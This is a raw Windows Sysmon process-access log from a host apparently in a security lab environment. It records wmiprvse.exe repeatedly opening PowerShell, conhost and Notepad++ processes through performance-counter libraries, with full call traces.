21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150949Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150948Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150947Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150946Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150945Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150944Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150943Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150942Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150941Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150940Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150939Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150938Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150937Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150936Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150935Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150934Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 